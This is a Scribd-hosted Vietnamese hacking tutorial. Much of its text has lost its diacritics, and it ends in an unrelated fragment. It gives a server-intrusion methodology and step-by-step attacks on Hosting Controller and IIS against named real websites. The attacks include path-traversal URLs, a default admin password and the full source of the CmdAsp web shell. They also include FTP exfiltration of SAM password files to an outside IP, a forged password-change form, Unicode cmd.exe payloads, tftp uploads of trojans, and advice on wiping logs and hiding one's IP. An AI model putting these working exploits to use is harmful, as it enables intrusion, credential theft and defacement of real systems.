Scribd Logo
Upload

Welcome to Scribd!

  • CacBuocHackServer Tech24 VN

    Uploaded by

    Hop Huynh
    7 views21 pages

    Original Title

    CacBuocHackServer_tech24_vn

    Copyright

    © Attribution Non-Commercial (BY-NC)

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    7 views21 pages

    CacBuocHackServer Tech24 VN

    Uploaded by

    Hop Huynh

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 21

    Cc bc Hack Server !

    Cc bc ca hacker khi mun t nhp vo mt h thng my ch : <Bc 1> FootPrinting : Cc mc tiu ca bc ny ch yu l nhng thng tin ban u v server . Cng ngh bn cn s dng l : Open source search ( ngun my ch tm kim ) Whois , Web interface to whois , Arin Whois , DNS zone transfer ( b phn ny ch yu l kim tra v ngi ch server , DNS .. cu trc server cha th hin r y ) 1 s cng c : UseNet , search engines ( cng c tm kim ) , Edgar Any Unix client , http://www.networksolutions.com/whois , http://www.arin.net/whois , dig , nslookup Is d , Sam spade <Bc 2> Scanning : Phn ln cc server chu bung thng tin quan trng trong bc ny , hy c gng tn dng bc ny trit bit cc port trn server , nghe ng d liu . Cng ngh bn cn s dng l : Ping Sweep , TCP/UDP port Scan , Os Detection . Cc cng c : fping , icmpenum Ws_ping ProPack , nmap , SuperScan , fscan nmap , queso , siphon . <Bc 3> Enumeration : n bc ny , cc attacker bt u kim sot server s b , xc nh cc account trn server , mc bo v ... Cng ngh bn cn s dng l : List user accounts , List file share , Identify applications . Cc tool ph tr : null sessions , DumpACL , sid2user , OnSite Admin showmount , NAT , Legion banner grabbing vi telnet , netcat , rpcinfo . <Bc 4> Gaining access : Aha , c d liu kt hp tt c chng li . Chng ta bt u n gn mc tiu . Hy nm chc c hi . 1 account c th b Crack . Cng ngh : Password eavesdropping , File Share brute forcing , Password file grab , buffer overflows . Cc tool : tcpdump , L0phtcrack readsmb , NAT , legion , tftp , pwdump2 ( NT ) ttdb , bind , IIS , .HTR/ISM.DLL <Bc 5> Escalating privilege : Nu 1 account khng may mn no mt cp no b crack bc trn , chng ta s c ci tn dng iu khin Server . Cng ngh : Password cracking , BUG ,Exploits . Tools : john , L0phtcrack , Ic_messages , getadmin , sechole . <Bc 6> Pilfering : Thng tin ly t bc trn ta nh v server v iu khin server . Nu bc ny khng thnh cng , hy n bc <9> . Cng ngh : Evaluate trusts , Search for cleartext passwords . Tool : rhost , LSA Secrets user data , configuration files , Registry . <Bc 7> Covering Tracks : H thng lun ghi nhn nhng hnh ng ca bn . Nu by gi m kt thc , chc bn b tm ngay . y l bc cc k quan trng . XA LOG . Cng ngh : Clear logs , hide tools . Tools : Zap , Event log GUI , rootkits , file streaming . <Bc 8> Creating Backdoors : Cn phi hi , bn phi li 1 ci cng sau , ln sau c

    vo th d hn ch . Nu khng thnh cng , quay li bc <4> xem li cc quyn ca user bn s dng . Cng ngh : Creat rogue user accounts , schedule batch jobs , infect startup files , plant remote control services , install monitoring mechanisms , replace apps with Trojan . Tools : members of wheel , administrators cron, At rc , Startup folder , registry keys , netcat , remote.exe , VNC , BO2K , keystroke loggers, add acct to secadmin mail aliases login , fpnwclnt.dll <Bc 9> Denial of Servies : 1 attacker khng thnh cng vi nhng g anh ta lm ... h s tn dng nhng exploits code lm cho server ngng hot ng lun , gi l : tn cng t chi dch v . Cng ngh : SYN flood , ICMP techniques , Identical src/dst SYN requests , Overlapping fragment/offset bugs , Out of bounds TCP options ( OOB ) DDoS . Tools ph tr : synk4 , ping of death , smurf land , latierra , teardrop , bonk , newtear , supernuke.exe , trinoo/TFN/stacheldraht Nhng tool trn , bn c th search cc my tm kim nh http://www.google.com Hack Server NT qua bug Hosting Controller : Li HC l li ca phn mm Hosting Controller dng qun l server cung cp domain v hosting cho khch hng thng c chy di Win2000/NT. Ti s Hack qua li HC v s v d vi 1 server cha fix l server cha 38 site m c Hacker Forum Hacked vo thng trc . + Li HC cho bn thc hin 1 dng lnh c cng ( C; D; E ) thm ch c A ca server qua 1 site hoc trc tip bng ID ca server. Li HC thc cht l b li ca 4 file nm trong phn mm l : statsbrowse.asp ; servubrowse.asp ; browsedisk.asp ; browsewebalizerexe.asp ; sqlbrowse.asp Ti s vit cu trc ca lnh Hack vo server nh li 4 file ny : .................. Trong HC c th l : admin ; advadmin; hostingcontroller Li u tin ti gii thiu vi cc bn c tn Multiple security vulnerabilities. y l cc on Script cho php bn duyt bt c file no trn Server : http://www.victim.com/advwebadmin/stats/st...epath=c:/&Opt=3 http://www.victim.com/advwedadmin/serv_u/s...epath=c:/&Opt=3 http://www.victim.com/advwedadmin/adminset...epath=c:/&Opt=3 http://www.victim.com/advwedadmin/adminset...epath=c:/&Opt=3

    http://www.victim.com/advwedadmin/SQLServ/...epath=c:/&Opt=3 Trong Victim l Server b li HC m bn mun Hack Ti s v d cc Hack server qua 1 site nm trong server (hay cn gi l Hack local exploit) VD : site ny b Hacker Forum hack : http://123hollywood.com/hf.htm thanh Address bn nh 1 trong cc dng lnh sau : http://123hollywood.com/admin/stats/statsb...=c:\&Opt=3 http://123hollywood.com/admin/serv_u/servu...=c:\&Opt=3 http://123hollywood.com/admin/adminsetting...=c:\&Opt=3 http://123hollywood.com/admin/adminsetting...=c:\&Opt=3 http://123hollywood.com/admin/SQLServ/sqlb...=c:\&Opt=3 Lc ny bn s vo c phn "Browser Directories". y l ton b cu trc ca Website . Khi cc bn vo c bn trong ca C:\ bn thy c th mc websites (i vi server ang th nghim ny, cn i vi cc server khc th n thng nm D:/) . Nu bn thy th OK . Bn hy vo trong v thy 1 lot cc website. Vi server chng ta ang Hack trn bn s thy cc website c a vo cc th mc ring l theo vn. Chng ta hy tm ti website m nh n chng ta vo dc server ny . Bn hy vo 123web/123kinh/123hollywood.com/www/. Bn thy cc k n gin ng khng . Sau khi bit c ng dn ca site cn Hack th bn dng Script sau : http://www.example.com/advwebadmin/folders...om&OpenPath=C:/ Thay example bng tn ca Server v testing bng tn trang Web mun Hack V d : Bn ng k Website tn cuonglong ca FPT th ti FPT s cho bn mt ni trang Web : c:\webspace\resadmin\cuonglong\cuonglong.com\www Mun Hack trang ny th bn nh Script nh trn : http://www.ftp.com/advwebadmin/folders/fil...om&OpenPath=C:/ Vy l bn vo c cu trc th mc ca Web nhng lc ny bn ch quyn upload 1 file no t cng ca bn ln site thi Sau bn upload file ntdaddy.asp Website . V chy file ny trn Website ly nhng file *.mdb v *.SAM v, y l file cha password, bn ch vic gii m ra Vy l bn Hack c Website ri By gi ti s hng dn cc bn cch upload v xo file trn cc site ny : Ci ny th cng cc k n gin, bn hy xem mu sau : http://www.eg.com/hc/folders/filemanager.a...om&OpenPath=C:/ trong testing l cc ng dn vo website m bn mun upload ; OK ! By gi th bn c th nghch thoi mi; Bn c th cho ton b site die trong

    1 gi cng c hi hi .. Cn 1 vi li na ca HC, trong c li cho php bn c kh nng khi to cho mnh 1 hosting trong server nh dng lnh sau : http://victim.com/admin/autosignup/dsp_newwebadmin.asp Cng nh trn, Victim l Server b li HC m bn mun Hack. V d l Website http://bigguy.ourweb.net/ http://bigguy.ourweb.net/AdvAdmin/autosign...newwebadmin.asp Mnh khi to ci ny, cc bc v xem : http://www.hackerforum.com/ Li ny cho php cho ng k free Domain. Bn hy ng ngay 1 Domain cho mnh ri vo http://www.victim.com/AdvAmin/ Login vi vi Account va ng k. Sau khi Login, bn click vo mc Directories trn menu ri vo Domain ca bn. Sau , bn hy upload trang web ca mnh ln (ni upload di cng) v nh l tn trang web ng di, ri click vo logout ( bn phi trn cng). Vy l ta i c na chng ng Tip theo bn hy vo : http://www.victim.com/AdvAdmin/import/imp_...in.com\www Bn hy thay ch "username" bng username lc u bn ng k Domain v thay ch www.yourdomain.com bng a ch Domain m bn ng k v enter. V d ti ng k 1 Domain tn http://www.cuonglong.com/ vi username l ncviet Website http://bigguy.ourweb.net/ th ti s g : http://bigguy.ourweb.net/AdvAdmin/import/i...onglong.com/www y l phn Import ca Website. N s hin ra 4 khung ng dn. By gi bn hy tm trang web ca mnh khung th nht bn di v click vo n ri nhn nt "import". By gi n copy trang Web ca bn vo khung th hai bn di. Ok, vy l bn Hack xong ri . v d bn upload file cl.htm th ng dn Web ca bn s l : http://bigguy.ourweb.net/AdvAdmin/cl.htm Ch : http://www.victim.com/ s c thay bng Website b li hc. V c th trong qu trnh hack, server s bt gi IP ca bn v vy bn nn ngy trang cho tht kho . Bn c th tm rt nhiu server hin vn cn ang b li ny bng cch v http://www.google.com/ ri nhp t kho "Hosting Controller" cho n Search. Tip theo l mt li slash dot dot ca HC cho php ta thy c ng dn cc a v cc th mc ca server v ta c th li dng n add (thm vo) mt ng dn DSN ch ti mt a ch mi. khai thc li ny bn dng on code sau : http://www.target.com/admin/dsn/dsnmanager....\..\ Ci th hai l chng ta c th thay i hon ton hay add vo th mc admin v thi hnh nhng g chng ta mun. khai thc li ny ch cn a vo on code sau : http://www.target.com/admin/import/imp_roo...tpPath=C:\ Bn c th nm quyn iu khin ton b cc file trong th mc (v c th l c C:\) v thay i ty thch.. V li cui cng l default password, nu admin khng xo hay thay i user c tn l AdvWebadmin (user default) th iu ny rt nguy him, bi v ta c th nm quyn iu

    khin hon ton server (hay 1 phn) thng qua password default cho user ny l "advcomm500349", sau th hack ch l vic d dng. Tin th mnh cng ch thm cho cc bn cch ci trojan hoc 1 chng trnh DoS (Denial of Service) vo server m ban vo c phc v cho cng vic Hack cho mnh sau ny. Thng th khi Hack qua li HC bn rt kh c th ci thng chng trnh vo C:/ nh li IIS c. Nhng chng ta vn c th ci 1 chng trnh nh chng ta setup qua site nm trong server. Bn hy Upload 1 con trojan vo 1 site m chng ta mun (Cch Upload nh trn ni). Sau y ti s ci 1 con reaccserver c chc nng khi ci vo 1 server chng ta c th iu khin server bng my tnh nh mnh. Ti upload file reaccserver.exe ln site http://123hollywood.com/ . By gi mun ci t trojan ny vo trong server bn hy nh dng sau : http://123hollywood.com/reaccserver.exe Bn t hi lm sao m n c th ci vo c server m khng qua thng bo my ch. ng, thng th cc phn mm qun l Hosting s thng bo my ch nhng thng th ngi qun l server s b qua ch ny khi ci t HC Khi bn nh dng trn nu thnh cng th IE s thng bo "server setup file full". Nu khng thnh cng n s bo "Can't not Found". Lc ny bn hy nh li : http://123hollywood.com/../../../reaccserver.exe m bo s OK Ch : khi setup file th PC ca bn cng s b ci t chng trnh . Bn hy g n ra . Va ri mnh ci t trojan reaccserver ri. By gi bn hy dng phn cn li ca chng trnh l file cp.exe. Chng ta c th Shutdown hoc Restart server kia. Thng th server s mt t nht 3 pht khi ng li . By gi mnh cng ni thm v li 1 s Website cc server ci t HC l thng cc file upload.asp nm trong cc th mc ca Website. V vy mc d li HC c b fix th chng ta cng Hack nh thng . y l v d : http://www.aten2000.com/aspupload_samples_...rmAndScript.asp Bn thy cha ! Mnh c th upload bt c file no m mnh mun . By gi mnh th tm cu trc thng c1o ca 1 website ci HC nha. Bn hy vo y : http://www.aten2000.com/cmd.asp xem ton b server vi cc lnh dir C:\ ; dir D:\ ; dir E:\ v c file bng lnh type C:\..[ngdn].. ----> Ch : lnh ny c th c c bt c file no . Bn th tm trong m xem cng c nhiu lm . khi cc bn vo c server, bn nn ci 1 file ASP c cng cho . y l cu trc ca file cmd.asp : ----------------------------------------------------------------------<%@ Language=VBScript %> <% ' --------------------o0o-------------------' File: CmdAsp.asp ' Author: Maceo <maceo @ dogmile.com> ' Release: 2000-12-01 ' OS: Windows 2000, 4.0 NT

    ' ------------------------------------------Dim oScript Dim oScriptNet Dim oFileSys, oFile Dim szCMD, szTempFile On Error Resume Next ' -- create the COM objects that we will be using -- ' Set oScript = Server.CreateObject("WSCRIPT.SHELL") Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") ' -- check for a command that we have posted -- ' szCMD = Request.Form(".CMD") If (szCMD <> "") Then ' -- Use a poor mans pipe ... a temp file -- ' szTempFile = "C:\" & oFileSys.GetTempName( ) Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) End If %> " method="POST"> ------------------------------------------------------------------------------------NTDaddy c th download y: ntdaddy download mt s server, khng r l do ta phi dng kt hp c cmdasp v ntdaddy mi hiu qu. khai thc, c 2 ngun thng tin cc k quan trng m ta cn quan tm trc tin, l database ca HC v file sam._, ni cha tt c cc thng tin v cc host trn server. File sam._ tht ra ch l bn backup, c th ko y , thng c lu winnt\repair. Bn sam y c winnt\system32\config, nh b lock, rt kh ly. Sau khi ly c sam._, cc bn dng l0pht hoc Lc3 (download http://www.l0pht.com/ hoc rt nhiu trn net) crack. Cn database ca cc host, thng lu tr th mc ci t HC, vd nh c:\program files\advanced communitations\NT web hosting\...., l mt file access. Cch download cc file nh th no!? c vi cch cho bn, nu bn bit c v tr lu tr data cc host trn server (vd nh dng d:\users\www\democoun\www, a ch ny thc cht khi browse trn browser s l http://www.democoun.com/ chng hn - y ch l vd, cc bn phi t tm hiu folder c th, iu ny rt quan trng), bn c th dng lnh copy, chp thng cc file ny vo th mc trn, sau download thng xung t

    browser, nh www.democoun.com/sam._ . Cch khc l dng ftp send file mnh mun n 1 a ch ftp m mnh bit, bng g lnh trong cmdasp.asp hay nddaddy.asp (Cch ny ti c Kha cung cp thng tin). Tuy nhin, ta ko th nhp v chy tng lnh tng tc ftp dng cc trnh ny c, bn phi to 1 file text c cha danh sch cc lnh v yu cu ftp chy cc lnh . Cch to 1 filte text, ta s dng lnh echo, xem vd sau: echo OPEN 111.214.156.105 > c:\dl.txt & vol sau khi nhp vo textbox lnh ca cmdasp v run, lnh ny s to mt file c:\dl.txt c cha lnh "open 111.214.156.105". Gn tng t vi cc lnh khc, vd lnh sau s thm 1 dng vo sau lnh open trong file dl.txt: echo USER anonymous anyname@anon.com >> c:\dl.txt & vol Lu t cu lnh th 2 tr i, ta phi dng ">>" thay v ">". Cc bn lm tng t vi cc lnh cn li, sao cho cc lnh trong dl.txt dng send ftp 1 file t nht phi c cc lnh sau: OPEN 111.214.156.105 USER USER anonymous anyname@anon.com binary send C:\sam._ sam._ BYE Cc lnh trn s send file c:\sam._ server bn ang hack n a ch anon 111.214.156.105. Nh vy, bn to xong 1 script ftp file cn. By gi dng lnh sau thc thi cc lnh trong dl.txt. Trc tin, bn chuyn v th mc cha dl.txt, dng lnh cd c:\, v nhp lnh sau vo lnh cmdasp: "ftp -n -s:c:\dl.txt" v Run! Nu thnh cng, tc l browser ko bo li v ch hin cc thng tin kt ni ftp...th file sam._ c gi n a ch anon trn. Bn ch vic ftp vo download v. Sau bn dng chng trnh L0phtCrack gii m file SAM Lu l cc file bn copy v download xong, hy xa trnh b pht hin. Mun tm cc Website b li Hosting Controller th bn vo http://www.google.com/ ri g : "allinurl:/advadmin" (khng c du ngoc kp) nhn nt Google Search Tha cc bn, nhng g mnh pht hin cng chng phi mi m g, chng qua l tn dng cc li bit ca HC thi. Cng ging nh p dng l thuyt vo bi tp thi! :smg] Sau khi ng k 1 account vi ng dn: http://www.victim.com/hc/autosignup/dsp_newwebadmin.asp Th cc bn c quyn UPLOAD ln server cc trojan v backdoor. Nhng lm sao active n c? Bn hy lm theo cc bc sau y: 1.Tm a ch IP ca my Server host trang web .

    2.G ng dn ti trojan theo dng sau (ti ch bit cmdasp.asp v ntddady.asp nn ti ci n ln): http://d/?a-ch?-IP-Server/resadmi....asp.asp (http://a-ch-IP-Server/restadmin/username-bn--ng-k/www/cmdasp.asp). Tu theo Server m tn ng dn ny c th hi khc bit cht t. Bn c th dng 1 trong 5 bug cho xem cu trc th mc ca Server bit r rng chnh xc. Tng ng vi a-ch-IP-Server l th mc WWWROOT trong Server. Ti y th c 2 kh nng xy ra: * Admin Server cho bn quyn to, xo, copy cc file trn my tnh. Th th OK ri, bn ly cc file password v v crack n ra. Hoc lm g tu bn. :smg] * Bn ch c th s dng cc lnh bnh thng nh dir, net user, netstat, ...Nhng khng th xo v copy cc file. Lm sao by gi :sad] ? Chng ta hy qua bc 3. (Nhn Admin hm ri mnh ni t l thnh cng c th t 60% cng l v l do . Nu gp Admin no cn thn, n chng ghi tt c cc cng th mnh b tay. Lc chc phi nh n cc bn thi.) 3. :shy] Rt may l bn c th khai thc bng cch khc l iu chnh tp tin Autoexec.bat bng lnh ECHO trn CMDASP.ASP. By gi bn hy tm cc backdoor hoc trojan c th t n ci t v n np trn server WinNT.Nu bn cha c c th vo TLSECURITY.NET hoc GOOGLE.COM Search. Tip theo bn hy upload n ln account ca bn. Sau tin hnh sa i ni dung ca tp tin AUTOEXEC.BAT ( trong th mc C:\ ) bng cch dng lnh ECHO trong cmdasp.asp thm vo dng lnh cng chnh l path(ng dn) n tp tin thi hnh ca Backdoor (hay trojan) m bn upload ln. Xong!! :smoking] By gi th bn t c mc ch t nhp vo trang web ri , n mng chin thng di ch . Thnh Cng Hay Tht Bi cn li l ph thuc vo k nng v kinh nghim che giu tung tch v hack ca bn . Chc may mn nh!! Nu thiu st (mnh ngh nht nh l c) th cc bn sa cha dm mnh nh, cm n nhiu!! Chc vui v!! Bye --------------------------------------------------------------------------------------------------Nu Hosting Controller cha patch th khng nn dng cch ny bi t l thnh cng ca n rt thp,theo ti cha chc c 6% ch khng phi 60% na.y l nhng iu kin buc phi c nu mun s dng cch trn: -Th nht : phi tm c real IP ca server:real IP ca server l IP tr vo wwwroot trong a C (mc nh l nh vy).1 server config rt nhiu IP nht l server dng host,nh vy vic tm c real IP l rt kh khn,ngay c khi vo c server ri

    th vic tm ra real IP cng l c 1 vn ch khng ni l lng vng ngoi server . -Th hai : Th mc web ca resadmin (th mc cha web c to t quyn ca resadmin m ta li dng li HC to account) phi nm trong wwwroot m real IP tr ti,chng hn th mc web ca resadmin phi nm ti C:\inetpub\wwwroot\resadmin\viethacker\viethacker.net\www .Trn thc t th rt t trng hp nh vy bi cc hosting thng hay web user directory 1 ch khc hoc 1 a khc m bo an ton. -Th ba : trong trng hp tm c real IP v th mc web ca resadmin t trong wwwroot m real IP tr ti th cn phi cn iu kin l wwwroot khng b hn ch quyn i vi web user c ngha l web user c th truy cp vo cc file v subforder ca wwwroot t real IP. -Trong trng hp hn hu c 3 iu kin trn v vo c server nhng cha ly c quyn Admin th cng kh khai thc bi b nhiu restrict (hn ch t pha server v nhiu trojan ch hiu qu khi c chy di quyn Admin,cn y chng ta ch vo server vi quyn ca web user.Hy tm cch ly c quyn Admin khi ang vo server vi t cch l 1 web user. File /accounts/updateuserdesc.asp khng kim tra li logged in user khi submit, do vy bng vic sa li file ny chng ta c th i password ca bt k mt user no Cch lm : Dnh cho cc bn to c webadmin user, cn ai to c reseller admin th s n gin hn (t nghin cu thm nh). Trc tin bn lu file sau thnh file updateuserdesc.asp trn cng ca bn: updateuserdesc.asp <!--Session Variable Names Reference--> <!-- #inlcude file="adovbs.inc"--> <html> <head> <title>Update User Information</title> <META HTTP-EQUIV="Expires" CONTENT="-1"> <META HTTP-EQUIV="Pragma" CONTENT="No-Cache"> <script type="text/javascript" src="http://www.yourvictim.com/admin/css/jslib.js"></script> <link rel="stylesheet" type="text/css" href="http://www.yourvictim.com/admin/css/tbset.css"> <link rel="stylesheet" type="text/css" href="http://www.yourvictim.com/admin/css/tbset.css"> <script language="JavaScript">

    function CheckEntries(frm) { var flag; Empty = false; if (frm.PassCheck.checked ) { if (frm.Pass1.value == "" ) { alert("The password or confirm password are empty"); frm.Pass1.focus(); return false; } }

    frm.action="http://www.yourvictim.com/admin/accounts/AccountActions.asp?ActionTyp e=UpdateUser&User Name="+frm.UserName; frm.submit(); } function GoBack(frm) { frm.action="AccountManager.asp"; frm.submit(); } </script> </head> <body> <form name="newUserForm" action="http://www.yourvictim.com/admin/acounts/AccountActions.asp?ActionType=U pdateUser" method="post" onSubmit="return CheckEntries(newUserForm)"> <center><h2>Update User Account</h3><p></center> <center> <table BORDER="0" align="center" CELLSPACING="1" CELLPADDING="1" width="60%" class="trhead"> <tr>

    <td>Alter</td> <td>User Information</td> </tr> </table> <table align="center" class="trbody" width="60%"> <tr> <td> User Name: </td> <td> killuser </td> <input type="hidden" name="UserName" value="killuser"> </tr> <tr> <td> Full Name: </td> <td> <input name="FullName" align="LEFT" tabindex="2" title="New Full Name" value="killuser"> </td> </tr> <tr> <td> Description : </td> <td> <input name="Description" align="LEFT" tabindex="3" title="Description" value=""> </td> </tr> <tr> <td> Change Password Also: </td> <td> <input type="checkbox" name="PassCheck"

    value="TRUE">&nbsp;&nbsp;&nbsp;&nbsp; <a href="javascript:callHelp('http://www.yourvictim.com/admin/acounts/help/reseller/chang e_password.h tm')"><img src="..\images\help.gif" border="0" value="Help"></a> </td> </tr> <tr> <td> New Password&nbsp; :&nbsp; </td> <td> <input type="password" name="Pass1" align="LEFT" tabindex="4" title="Password"> </td> </tr> <tr> <td> Account Disabled: </td> <td> <input type="checkbox" name="AccountDisabled" align="LEFT" tabindex="6" title="Account Disabled" >&nbsp;&nbsp;&nbsp;&nbsp; <a href="javascript:callHelp('http://www.yourvictim.com/admin/acounts/help/reseller/disabl e_account.h tm')"><img src="..\images\help.gif" border="0" value="Help"></a>

    </td> </tr> <tr> <td> User Cannot Change password: </td> <td> <input type="checkbox" name="UserChangePassword" align="LEFT" tabindex="7" title="Change Password" > </td> </tr> </table> <input type="hidden" name="ActionType" value="AddUser" title="AddUser"> <table WIDTH="60%" ALIGN="center" CELLSPACING="1" CELLPADDING="1" class="trhead"> <tr> <td><input type="button" class=butn name="Update" value="Update User" align="MIDDLE" tabindex="7" title="Submit" onclick="return CheckEntries(this.form)"></td> <td><input type="button" class=butn name="Cancel" value="Back" align="MIDDLE" tabindex="7" title="Submit" onclick="return GoBack(this.form)"></td> </tr> </table> </form> </body> </html>

    Ch nh i li www.yourvictim.com v killuser (username ca user m bn mun i). Sau vo www.yourvictim.com v login vo bng webadmin account ca bn. Sa url address thnh c:\your dir\updateuserdesc.asp , trang updateuser ca hc s hin ln vi username = killuser, bn ch vic check vo "Change Password Also" v nhp password

    mi vo "New password", ri Submit ==> DONE Kim tra li bng cch login vo vi user "killuser". Bn c th tm tn cc user bng cch duyt cc th mc con trong web root ca hc, v tn th mc chnh l tn user. Ch l vic sa password s b pht hin ra ngay khi user tht login vo, do khng nn lm dng. IIS Server Chao anh em! Hom nay toi lai tiep tuc gioi thieu voi anh em mot ky thuat hack vao IIS Server nua. Tai lieu nay khong phai cua em, ma em chi di "hoc lom" duoc tren Internet va da thuc hanh roi. Thay hay hay len muon cung anh em trao doi. Buoc 1: Anh em can mot file Unicode duoi dang Perl (*.pl) va mot chuong trinh Perl. Buoc 2: Sau khi da chuan bi xong. Anh em ra DOS go: perl unicode.pl Se thay Host: (go dia chi Website ma anh em muon xac dinh xem co phai la IIS khong) Port: Go 80. ..... Cho mot chut neu la IIS no se tim cac Bug tren IIS. Trong file Unicode.pl co chua khoang 20 Bug. 1] /scripts/..%c0%af../winnt/system32/cmd.exe?/c+ [2]/scripts..%c1%9c../winnt/system32/cmd.exe?/c+ [3] /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+ [4]/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+ [5] /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+ [6] /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+ [7] /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+ [8] /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+ [9] /scripts/..%c1%af../winnt/system32/cmd.exe?/c+ [10] /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+ [11]/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+ [12] /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+ [13] /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+ [14] /msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe?/ c+ [15] /cgibin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+ [16] /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+

    [17] /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/ c+ [18] /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+ [19] /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+ [20] /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/ c+ Buoc 3: Anh em mo Browser go dia chi trang Web va copy phan bug ma Unicode phat hien vao. VD: Toi go perl unicode.pl Host: http://www.tnh.com.vn Port: 80 Sau khi no Scan thi thay cai Host nay co 2 Bug 14 va 18. Toi co the su dung mot trong 2 bug nay. Chang han toi su dung Bug 18. Toi mo Browser, trong thanh Add toi go: http://www.tnh.com.vn/_vti_bin/..%c0%af..%...m32/cmd.exe?/c+ Vay la ban da dot nhap duoc vao IIS roi day. Cac ban co the truy cap vao o cung cua IIS nhu la o cung cua minh vay. Cac ban co the tao, xoa, di chuyen, thu muc, file, up, down va run cac file tren Server do...Muon vay cac ban chi can dung cac lenh cua DOS thoi. Dung noi voi toi la cac ban khong biet lenh Dos nha. VD: De doc o C----Cac ban go dir+c:\----Tuong ung voi dong lenh o Browser. http://www.tnh.com.vn/_vti_bin/..%c0%af..%.../c+dir+c:\ Tuong tu co cac lenh nhu: md, rd, ren...Cu ngam lai sach DOS la OK het a. P/S: Thong thuong trang Web thuong o inetpub\wwwroot Anh em chi can dzo day thay File index.html cua no bang index.html cua minh. Vay la OK! Website do bi hack roi day. Nho dung cac chuong trinh de che dau IP cho an toan nha. Khong la boc lich nhu choi day. Duoi day la mot so Website dung IIS http://www.psv.com.vn/ http://www.tnh.com.vn/ http://www.mekonggreen.com.vn http://www.thaiweb.co.th/ http://www.khaitri.com.vn/

    Cach xac dinh Bug va cach dot nhap vao o cung cua Server do em da de cap voi anh em o bai viet truoc roi nha. Cu cho la anh em da dot nhap duoc vao o cung cua Site do roi di. De Down file anh em dung lenh type (xem noi dung file cua DOS). Voi cac file *.html, *.txt thi no se View noi dung cho anh em xem, con voi cac file khong View duoc thi no se hien len cua so yeu cau Save to disk (khong phai Server nao cung lam duoc nhu vay dau, con tuy). VD: em muon down mot file o www.tnh.com.vn (em thi chi quen thuc tap bang cai nay thoi a). Em go http://www.tnh.com.vn/_vti_bin/..%c0%af..%...ype+c:\ten file muon Down. Anh em dung len qua lam dung cung nhu tan pha qua dang cac site. P/S: Hack IIS thi duoc roi, nhung di dao tren Iiternet em thay da so cac site thuong dung Apache Server. Em dang tap Hack Apache Server. Em hien dang co mot tai lieu day hack Apache Server, em doc thay kha de hieu....Nhung khi thuc hanh thi mai khong duoc, khong biet la tai Server do Patch roi hay la tai em ngu. Anh nao biet cach hack Apache lam on huong dan anh em voi....Website cua bon FPT cung dung IIS, nhung rat tiec la no da Patch roi. UP FILES TRONG IIS SERVER

    Em se gioi thieu tiep voi anh em cach Up file len IIS da bi bug. Bai nay khong phai do em viet, em chi di hoc lom thoi, thay hay thi post cho anh em thoi a. Dau tien anh em can tai doan Code (lai ten la Unicode) tu dia chi: http://www.cners.com/tools/unicode.zip

    Chay file tftpd32.exe ( hoac tftpd.exe toi quen roi ) truong hop ko ro rang anh em cu rename sao cho co du 2 file tftpd.exe va tftpd32.exe vay . Chay file nay ,sau do xem so IP va ghi lai . Dung notepad mo file uniexe.pl ra, sua cho xxx.xxx.xxx.xxx thanh so IP vua co tu tftpd . Sua cac thong so tren cung hang voi cho xxx.xxx.xxx.xxx vua dien : +thay "GET ncx99.exe" thanh "GET yyy.zzz" voi yyy.zzz la mot file nam tren o cung cua anh em +thay phan C:\inetpub\scripts bang duong dan den thu muc anh em muon upload file xem

    vd sau de ro hon : #You need to change the xxx.xxx.xxx.xxx to your ip address. Duh! $command="tftp -i 202.162.63.126 GET index.htm c:\\inetpub\\wwwroot\\index.htm"; ---> trong VD tren toi da copy 1 file trong thu muc C:\ cua toi ( co IP la 202.162.63.126 ) toi C:\inetpub\wwwroot\ cua may chu bi dinh unicode bug. Sau do anh em ra ngoai DOS, go Perl Ip cua may chu:port VD: perl uniexe.pl 202.162.45.78:80 Neu khong co van de gi thi file do da duoc Up len server roi do. Luu y: Ngoai up cac file *.html, anh em co the update cac trojan remote access hay la cac chuong trinh getadmin cho Winnt de doat quyen admin roi tung hoanh trong may chu nay. De chay file tren Server, ra Dos go: Perl uniexe.pl ip cua trang web:port ten file can run (co ca duong dan). P/S: Khong phai bat cu may chu nao cung cho phep anh em tao, di chuyen, hay run tren no dau. Tuy thuoc vao Admin thoi. Mot so anh em co noi rang khi Scan khong thay phat hien Bug nao, chac la no Patch het tron roi. Anh em can phai di kiem Website khac thoi....Theo em biet thi cac Website cua Thailand hay xai IIS lam. Em dang thuc hanh len cung chang can nhieu Server lam, hien dang thuc hanh tren http://www.tnh.com.vn/ Anh em nao can thi co the dzo luon o cung cua no thuc hanh bang cach copy doan Code sau vao Add trong Browser cua anh em. http://www.tnh.com.vn/_vti_bin/..%c0%af..%.../c+dir+c:\ Hay vao va tao mot thu muc HKC-LPTV. A quen, de an toan anh em len dung cac Proxy de truy zdo may nay. Sao mt thi gian bn rn...m tin v *chi dzi* (anyway, for those who really want to know what I have done in the last three months, pay a visit to http://www.phpmvc.net , a PHP port of 